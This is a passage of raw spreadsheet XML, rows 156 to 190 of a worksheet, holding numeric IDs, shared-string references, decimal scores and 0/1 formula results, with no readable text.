      <c r="O156" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="157">
      <c r="A157" s="62">
        <v>3116.0</v>
      </c>
      <c r="B157" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C157" s="63" t="s">
        <v>637</v>
      </c>
      <c r="D157" s="62" t="s">
        <v>638</v>
      </c>
      <c r="E157" s="62" t="s">
        <v>639</v>
      </c>
      <c r="F157" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G157" s="62">
        <v>0.95</v>
      </c>
      <c r="H157" s="64">
        <v>0.0</v>
      </c>
      <c r="I157" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J157" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K157" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L157" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O157" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="158">
      <c r="A158" s="62">
        <v>3130.0</v>
      </c>
      <c r="B158" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C158" s="63" t="s">
        <v>640</v>
      </c>
      <c r="D158" s="62" t="s">
        <v>641</v>
      </c>
      <c r="E158" s="62" t="s">
        <v>642</v>
      </c>
      <c r="F158" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G158" s="62">
        <v>0.9</v>
      </c>
      <c r="H158" s="64">
        <v>1.0</v>
      </c>
      <c r="I158" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J158" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K158" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L158" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O158" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="159">
      <c r="A159" s="62">
        <v>3184.0</v>
      </c>
      <c r="B159" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C159" s="63" t="s">
        <v>643</v>
      </c>
      <c r="D159" s="62" t="s">
        <v>644</v>
      </c>
      <c r="E159" s="62" t="s">
        <v>645</v>
      </c>
      <c r="F159" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G159" s="62">
        <v>0.9</v>
      </c>
      <c r="H159" s="64">
        <v>1.0</v>
      </c>
      <c r="I159" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J159" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K159" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L159" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O159" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="160">
      <c r="A160" s="62">
        <v>3185.0</v>
      </c>
      <c r="B160" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C160" s="63" t="s">
        <v>646</v>
      </c>
      <c r="D160" s="62" t="s">
        <v>647</v>
      </c>
      <c r="E160" s="62" t="s">
        <v>648</v>
      </c>
      <c r="F160" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G160" s="62">
        <v>0.9</v>
      </c>
      <c r="H160" s="64">
        <v>1.0</v>
      </c>
      <c r="I160" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J160" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K160" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L160" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O160" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="161">
      <c r="A161" s="62">
        <v>3207.0</v>
      </c>
      <c r="B161" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C161" s="63" t="s">
        <v>649</v>
      </c>
      <c r="D161" s="62" t="s">
        <v>650</v>
      </c>
      <c r="E161" s="62" t="s">
        <v>651</v>
      </c>
      <c r="F161" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G161" s="62">
        <v>0.9</v>
      </c>
      <c r="H161" s="64">
        <v>1.0</v>
      </c>
      <c r="I161" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J161" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K161" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L161" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O161" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="162">
      <c r="A162" s="62">
        <v>3284.0</v>
      </c>
      <c r="B162" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C162" s="63" t="s">
        <v>652</v>
      </c>
      <c r="D162" s="62" t="s">
        <v>653</v>
      </c>
      <c r="E162" s="62" t="s">
        <v>654</v>
      </c>
      <c r="F162" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G162" s="62">
        <v>0.95</v>
      </c>
      <c r="H162" s="64">
        <v>0.0</v>
      </c>
      <c r="I162" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J162" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K162" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L162" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="M162" s="62" t="s">
        <v>655</v>
      </c>
      <c r="N162" s="62" t="s">
        <v>199</v>
      </c>
      <c r="O162" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="163">
      <c r="A163" s="62">
        <v>3440.0</v>
      </c>
      <c r="B163" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C163" s="63" t="s">
        <v>656</v>
      </c>
      <c r="D163" s="62" t="s">
        <v>657</v>
      </c>
      <c r="E163" s="62" t="s">
        <v>658</v>
      </c>
      <c r="F163" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G163" s="62">
        <v>0.85</v>
      </c>
      <c r="H163" s="64">
        <v>0.0</v>
      </c>
      <c r="I163" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J163" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K163" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L163" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O163" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="164">
      <c r="A164" s="62">
        <v>3713.0</v>
      </c>
      <c r="B164" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C164" s="63" t="s">
        <v>659</v>
      </c>
      <c r="D164" s="62" t="s">
        <v>660</v>
      </c>
      <c r="E164" s="62" t="s">
        <v>661</v>
      </c>
      <c r="F164" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G164" s="62">
        <v>0.9</v>
      </c>
      <c r="H164" s="64">
        <v>0.0</v>
      </c>
      <c r="I164" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J164" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K164" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L164" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O164" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="165">
      <c r="A165" s="62">
        <v>7126.0</v>
      </c>
      <c r="B165" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C165" s="63" t="s">
        <v>662</v>
      </c>
      <c r="D165" s="62" t="s">
        <v>663</v>
      </c>
      <c r="E165" s="62" t="s">
        <v>664</v>
      </c>
      <c r="F165" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G165" s="62">
        <v>0.9</v>
      </c>
      <c r="H165" s="64">
        <v>1.0</v>
      </c>
      <c r="I165" s="64" t="s">
        <v>665</v>
      </c>
      <c r="J165" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K165" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L165" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O165" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="166">
      <c r="A166" s="62">
        <v>7946.0</v>
      </c>
      <c r="B166" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C166" s="63" t="s">
        <v>666</v>
      </c>
      <c r="D166" s="62" t="s">
        <v>667</v>
      </c>
      <c r="E166" s="62" t="s">
        <v>668</v>
      </c>
      <c r="F166" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G166" s="62">
        <v>0.95</v>
      </c>
      <c r="H166" s="64">
        <v>1.0</v>
      </c>
      <c r="I166" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J166" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K166" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L166" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O166" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="167">
      <c r="A167" s="62">
        <v>7992.0</v>
      </c>
      <c r="B167" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C167" s="63" t="s">
        <v>669</v>
      </c>
      <c r="D167" s="62" t="s">
        <v>670</v>
      </c>
      <c r="E167" s="62" t="s">
        <v>671</v>
      </c>
      <c r="F167" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G167" s="62">
        <v>0.85</v>
      </c>
      <c r="H167" s="64">
        <v>1.0</v>
      </c>
      <c r="I167" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J167" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K167" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L167" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O167" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="168">
      <c r="A168" s="62">
        <v>8023.0</v>
      </c>
      <c r="B168" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C168" s="63" t="s">
        <v>672</v>
      </c>
      <c r="D168" s="62" t="s">
        <v>673</v>
      </c>
      <c r="E168" s="62" t="s">
        <v>674</v>
      </c>
      <c r="F168" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G168" s="62">
        <v>0.9</v>
      </c>
      <c r="H168" s="64">
        <v>1.0</v>
      </c>
      <c r="I168" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J168" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K168" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L168" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O168" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="169">
      <c r="A169" s="62">
        <v>8479.0</v>
      </c>
      <c r="B169" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C169" s="63" t="s">
        <v>675</v>
      </c>
      <c r="D169" s="62" t="s">
        <v>676</v>
      </c>
      <c r="E169" s="62" t="s">
        <v>677</v>
      </c>
      <c r="F169" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G169" s="62">
        <v>0.9</v>
      </c>
      <c r="H169" s="64">
        <v>0.0</v>
      </c>
      <c r="I169" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J169" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K169" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L169" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O169" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="170">
      <c r="A170" s="62">
        <v>8494.0</v>
      </c>
      <c r="B170" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C170" s="63" t="s">
        <v>678</v>
      </c>
      <c r="D170" s="62" t="s">
        <v>679</v>
      </c>
      <c r="E170" s="62" t="s">
        <v>680</v>
      </c>
      <c r="F170" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G170" s="62">
        <v>0.95</v>
      </c>
      <c r="H170" s="64">
        <v>1.0</v>
      </c>
      <c r="I170" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J170" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K170" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L170" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O170" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="171">
      <c r="A171" s="62">
        <v>8732.0</v>
      </c>
      <c r="B171" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C171" s="63" t="s">
        <v>681</v>
      </c>
      <c r="D171" s="62" t="s">
        <v>682</v>
      </c>
      <c r="E171" s="62" t="s">
        <v>683</v>
      </c>
      <c r="F171" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G171" s="62">
        <v>0.9</v>
      </c>
      <c r="H171" s="64">
        <v>1.0</v>
      </c>
      <c r="I171" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J171" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K171" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L171" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O171" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="172">
      <c r="A172" s="62">
        <v>8765.0</v>
      </c>
      <c r="B172" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C172" s="63" t="s">
        <v>684</v>
      </c>
      <c r="D172" s="62" t="s">
        <v>685</v>
      </c>
      <c r="E172" s="62" t="s">
        <v>686</v>
      </c>
      <c r="F172" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G172" s="62">
        <v>0.9</v>
      </c>
      <c r="H172" s="64">
        <v>1.0</v>
      </c>
      <c r="I172" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J172" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K172" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L172" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O172" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="173">
      <c r="A173" s="62">
        <v>8792.0</v>
      </c>
      <c r="B173" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C173" s="63" t="s">
        <v>687</v>
      </c>
      <c r="D173" s="62" t="s">
        <v>688</v>
      </c>
      <c r="E173" s="62" t="s">
        <v>689</v>
      </c>
      <c r="F173" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G173" s="62">
        <v>0.9</v>
      </c>
      <c r="H173" s="64">
        <v>1.0</v>
      </c>
      <c r="I173" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J173" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K173" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L173" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O173" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="174">
      <c r="A174" s="62">
        <v>8888.0</v>
      </c>
      <c r="B174" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C174" s="63" t="s">
        <v>690</v>
      </c>
      <c r="D174" s="62" t="s">
        <v>691</v>
      </c>
      <c r="E174" s="62" t="s">
        <v>692</v>
      </c>
      <c r="F174" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G174" s="62">
        <v>0.9</v>
      </c>
      <c r="H174" s="64">
        <v>1.0</v>
      </c>
      <c r="I174" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J174" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K174" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L174" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O174" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="175">
      <c r="A175" s="62">
        <v>8920.0</v>
      </c>
      <c r="B175" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C175" s="63" t="s">
        <v>693</v>
      </c>
      <c r="D175" s="62" t="s">
        <v>694</v>
      </c>
      <c r="E175" s="62" t="s">
        <v>695</v>
      </c>
      <c r="F175" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G175" s="62">
        <v>0.9</v>
      </c>
      <c r="H175" s="64">
        <v>0.0</v>
      </c>
      <c r="I175" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J175" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K175" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L175" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O175" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="176">
      <c r="A176" s="62">
        <v>9667.0</v>
      </c>
      <c r="B176" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C176" s="63" t="s">
        <v>696</v>
      </c>
      <c r="D176" s="62" t="s">
        <v>697</v>
      </c>
      <c r="E176" s="62" t="s">
        <v>698</v>
      </c>
      <c r="F176" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G176" s="62">
        <v>0.9</v>
      </c>
      <c r="H176" s="64">
        <v>1.0</v>
      </c>
      <c r="I176" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J176" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K176" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L176" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O176" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="177">
      <c r="A177" s="62">
        <v>10053.0</v>
      </c>
      <c r="B177" s="62" t="s">
        <v>27</v>
      </c>
      <c r="C177" s="63" t="s">
        <v>699</v>
      </c>
      <c r="D177" s="62" t="s">
        <v>700</v>
      </c>
      <c r="E177" s="62" t="s">
        <v>701</v>
      </c>
      <c r="F177" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G177" s="62">
        <v>0.9</v>
      </c>
      <c r="H177" s="64">
        <v>1.0</v>
      </c>
      <c r="I177" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J177" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K177" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L177" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O177" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="178">
      <c r="A178" s="62">
        <v>7.0</v>
      </c>
      <c r="B178" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C178" s="63" t="s">
        <v>702</v>
      </c>
      <c r="D178" s="62" t="s">
        <v>703</v>
      </c>
      <c r="E178" s="62" t="s">
        <v>704</v>
      </c>
      <c r="F178" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G178" s="62">
        <v>0.85</v>
      </c>
      <c r="H178" s="64">
        <v>1.0</v>
      </c>
      <c r="I178" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J178" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K178" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L178" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O178" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="179">
      <c r="A179" s="62">
        <v>65.0</v>
      </c>
      <c r="B179" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C179" s="63" t="s">
        <v>705</v>
      </c>
      <c r="D179" s="62" t="s">
        <v>706</v>
      </c>
      <c r="E179" s="62" t="s">
        <v>707</v>
      </c>
      <c r="F179" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G179" s="62">
        <v>0.9</v>
      </c>
      <c r="H179" s="64">
        <v>1.0</v>
      </c>
      <c r="I179" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J179" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K179" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L179" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O179" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="180">
      <c r="A180" s="62">
        <v>68.0</v>
      </c>
      <c r="B180" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C180" s="63" t="s">
        <v>708</v>
      </c>
      <c r="D180" s="62" t="s">
        <v>709</v>
      </c>
      <c r="E180" s="62" t="s">
        <v>710</v>
      </c>
      <c r="F180" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G180" s="62">
        <v>0.95</v>
      </c>
      <c r="H180" s="64">
        <v>1.0</v>
      </c>
      <c r="I180" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J180" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K180" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L180" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O180" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="181">
      <c r="A181" s="62">
        <v>70.0</v>
      </c>
      <c r="B181" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C181" s="63" t="s">
        <v>711</v>
      </c>
      <c r="D181" s="62" t="s">
        <v>712</v>
      </c>
      <c r="E181" s="62" t="s">
        <v>713</v>
      </c>
      <c r="F181" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G181" s="62">
        <v>0.9</v>
      </c>
      <c r="H181" s="64">
        <v>1.0</v>
      </c>
      <c r="I181" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J181" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K181" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L181" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O181" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="182">
      <c r="A182" s="62">
        <v>163.0</v>
      </c>
      <c r="B182" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C182" s="63" t="s">
        <v>714</v>
      </c>
      <c r="D182" s="62" t="s">
        <v>715</v>
      </c>
      <c r="E182" s="62" t="s">
        <v>716</v>
      </c>
      <c r="F182" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G182" s="62">
        <v>0.9</v>
      </c>
      <c r="H182" s="64">
        <v>1.0</v>
      </c>
      <c r="I182" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J182" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K182" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L182" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O182" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="183">
      <c r="A183" s="62">
        <v>282.0</v>
      </c>
      <c r="B183" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C183" s="63" t="s">
        <v>717</v>
      </c>
      <c r="D183" s="62" t="s">
        <v>718</v>
      </c>
      <c r="E183" s="62" t="s">
        <v>719</v>
      </c>
      <c r="F183" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G183" s="62">
        <v>0.9</v>
      </c>
      <c r="H183" s="64">
        <v>1.0</v>
      </c>
      <c r="I183" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J183" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K183" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L183" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O183" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="184">
      <c r="A184" s="62">
        <v>295.0</v>
      </c>
      <c r="B184" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C184" s="63" t="s">
        <v>720</v>
      </c>
      <c r="D184" s="62" t="s">
        <v>721</v>
      </c>
      <c r="E184" s="62" t="s">
        <v>722</v>
      </c>
      <c r="F184" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G184" s="62">
        <v>0.95</v>
      </c>
      <c r="H184" s="64">
        <v>1.0</v>
      </c>
      <c r="I184" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J184" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K184" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L184" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O184" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="185">
      <c r="A185" s="62">
        <v>298.0</v>
      </c>
      <c r="B185" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C185" s="63" t="s">
        <v>723</v>
      </c>
      <c r="D185" s="62" t="s">
        <v>724</v>
      </c>
      <c r="E185" s="62" t="s">
        <v>725</v>
      </c>
      <c r="F185" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G185" s="62">
        <v>0.85</v>
      </c>
      <c r="H185" s="64">
        <v>1.0</v>
      </c>
      <c r="I185" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J185" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K185" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L185" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O185" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="186">
      <c r="A186" s="62">
        <v>323.0</v>
      </c>
      <c r="B186" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C186" s="63" t="s">
        <v>726</v>
      </c>
      <c r="D186" s="62" t="s">
        <v>727</v>
      </c>
      <c r="E186" s="62" t="s">
        <v>728</v>
      </c>
      <c r="F186" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G186" s="62">
        <v>0.95</v>
      </c>
      <c r="H186" s="64">
        <v>1.0</v>
      </c>
      <c r="I186" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J186" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K186" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L186" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O186" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="187">
      <c r="A187" s="62">
        <v>346.0</v>
      </c>
      <c r="B187" s="62" t="s">
        <v>29</v>
      </c>
      <c r="C187" s="63" t="s">
        <v>729</v>
      </c>
      <c r="D187" s="62" t="s">
        <v>730</v>
      </c>
      <c r="E187" s="62" t="s">
        <v>731</v>
      </c>
      <c r="F187" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G187" s="62">
        <v>0.95</v>
      </c>
      <c r="H187" s="64">
        <v>1.0</v>
      </c>
      <c r="I187" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J187" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K187" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L187" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O187" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="188">
      <c r="A188" s="62">
        <v>117099.0</v>
      </c>
      <c r="B188" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C188" s="63" t="s">
        <v>732</v>
      </c>
      <c r="D188" s="62" t="s">
        <v>733</v>
      </c>
      <c r="E188" s="62" t="s">
        <v>734</v>
      </c>
      <c r="F188" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G188" s="62">
        <v>0.8</v>
      </c>
      <c r="H188" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I188" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J188" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K188" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L188" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O188" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="189">
      <c r="A189" s="62">
        <v>117525.0</v>
      </c>
      <c r="B189" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C189" s="63" t="s">
        <v>736</v>
      </c>
      <c r="D189" s="62" t="s">
        <v>737</v>
      </c>
      <c r="E189" s="62" t="s">
        <v>738</v>
      </c>
      <c r="F189" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G189" s="62">
        <v>0.9</v>
      </c>
      <c r="H189" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I189" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J189" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K189" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L189" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O189" s="62">
        <v>0.0</v>
      </c>
    </row>
    <row r="190">
      <c r="A190" s="62">
        <v>117596.0</v>
      </c>
      <c r="B190" s="62" t="s">
        <v>31</v>
      </c>
      <c r="C190" s="63" t="s">
        <v>739</v>
      </c>
      <c r="D190" s="62" t="s">
        <v>740</v>
      </c>
      <c r="E190" s="62" t="s">
        <v>741</v>
      </c>
      <c r="F190" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G190" s="62">
        <v>0.9</v>
      </c>
      <c r="H190" s="64" t="s">
        <v>735</v>
      </c>
      <c r="I190" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J190" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
